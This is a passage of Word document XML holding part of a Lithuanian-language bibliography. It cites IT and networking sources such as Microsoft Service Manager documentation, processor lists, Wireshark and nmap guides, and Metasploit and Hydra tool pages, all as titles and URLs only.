      <w:hyperlink r:id="rId347" w:anchor=":~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/#:~:text=Solution%202%3A%20Configure%20the%20SSD,is%20not%20recognized%20by%20BIOS.&amp;text=Then%20you'll%20see%20SATA,your%20computer%20to%20enter%20BIOS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E84BA15"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Lee, T. (2020, liepos 9). A Guide to the Best Computer for 3D Modeling and Rendering. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Academy of animated art. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId348">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://academyofanimatedart.com/a-guide-to-the-best-computer-for-3d-modeling-and-rendering/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64E37F8F"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List of MediaTek processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wikipedia.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId349">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06A1792E"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Lost Configuration on Power Outage. (2020, liepos 25). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: https://community.cisco.com/t5/network-security/lost-configuration-on-power-outage/m-p/4125896</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB28039"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Lovinus, A. (2015, spalio 21). 5 Free Tools to Draw a Network Diagram. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Newegg + Business</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId350">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09EDF27D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Manage incidents and problems in Service Manager. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/incidents-problems?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087C488E"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Manage Service Manager user roles. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId351">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/user-roles?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22F82A55"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McMillen R. (2018, vasario 27). How to install and use Windows Server Backup on Server 2016. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Robert McMillen. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId352">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=lqjrF7f_eI4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="257CC1F1" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">McRee, R. (2011, kovo 21). OWASP Top 10 Tools and Tactics. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">InfoSec. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId353">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E2903D5"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Metasploit Framework. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId354">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.rapid7.com/metasploit/msf-overview/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4684CE95"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Metasploitable - Virtual Machine to Test Metasploit. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId355">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://information.rapid7.com/metasploitable-download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FF5F98D"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Metasploitable 2. A test environment provides a secure place to perform penetration testing and security research. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId356">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.rapid7.com/metasploit/metasploitable-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A7384BE"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Metasploitable download. Metasploitable is an intentionally vulnerable Linux virtual machine. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SourceForge. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId357">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CB843DD"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My computer is running slow, what steps can I do to fix it? (2020, gruodžio 31). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer Hope.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId358">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computerhope.com/issues/ch000179.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54106321"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kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microprocessor/Co-processor/Microcontroller families. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>CPU-World.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId359" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.cpu-world.com/CPUs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13B7CDC5"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Microsoft 365 Team (2019, rugsėjo 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Patarimai, kaip sudaryti savo tinklo diagramą. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId360">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D5DBDCF"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Most Common Computer Breakdowns. (2019, rugpjūčio 28). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Eclipse ICT.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: https://www.eclipseict.co.uk/most-common-computer-breakdowns/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60476D5D"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MSFconsole Commands. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive security. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId361">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F3B6759"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Muite B. (2020, lapkričio 6). How to install Nextcloud on CentOS 8. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">UpCloud. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId362">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://upcloud.com/community/tutorials/install-nextcloud-centos/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14F87DA7"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Nauser, V. ir Kessler, R.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Hydra Package Description.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Tools. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId363">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://tools.kali.org/password-attacks/hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1BF92B9D"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network Mapper.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Free and open source (license) utility for network discovery and security auditing.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId364">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="410AE580"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OneDrive.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId365">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://windows.microsoft.com/en-us/windows/microsoft-services-agreement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A133391"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Orgera, S. (2020, liepos 8). How to Use Wireshark: A Complete Tutorial. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lifewire. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId366">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.lifewire.com/wireshark-tutorial-4143298</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DAE3A3D"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Photoshop System Requirements. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adobe. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId367">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FFCF39B"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Pinterest.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId368">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://about.pinterest.com/en/terms-service</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="761A32AF"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Plan for System Center - Service Manager deployment. (2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/plan-deployment?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617584F" w14:textId="77777777" w:rsidR="000406E9" w:rsidRPr="005A5C28" w:rsidRDefault="000406E9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">Plummer, C. D. (1982, lapkritis). RFC 826 - An Ethernet Address Resolution Protocol: Or Converting. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Faqs.org</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId369">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.faqs.org/rfcs/rfc826.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28A3CEE7"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Pranešti apie incidentą. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nacionalinis kibernetinio saugumo centras prie Krašto apsaugos ministerijos.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId370">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.nksc.lt/pranesti.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F454597"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Prepare for System Center - Service Manager deployment. (2020, gruodžio 9). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/prepare-deploy?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8B8B40"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Qualcomm Processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId371">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.qualcomm.com/products/processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7769BE1C"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Ram (2019, gruodžio 30). How to install System Center Service Manager 2019? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
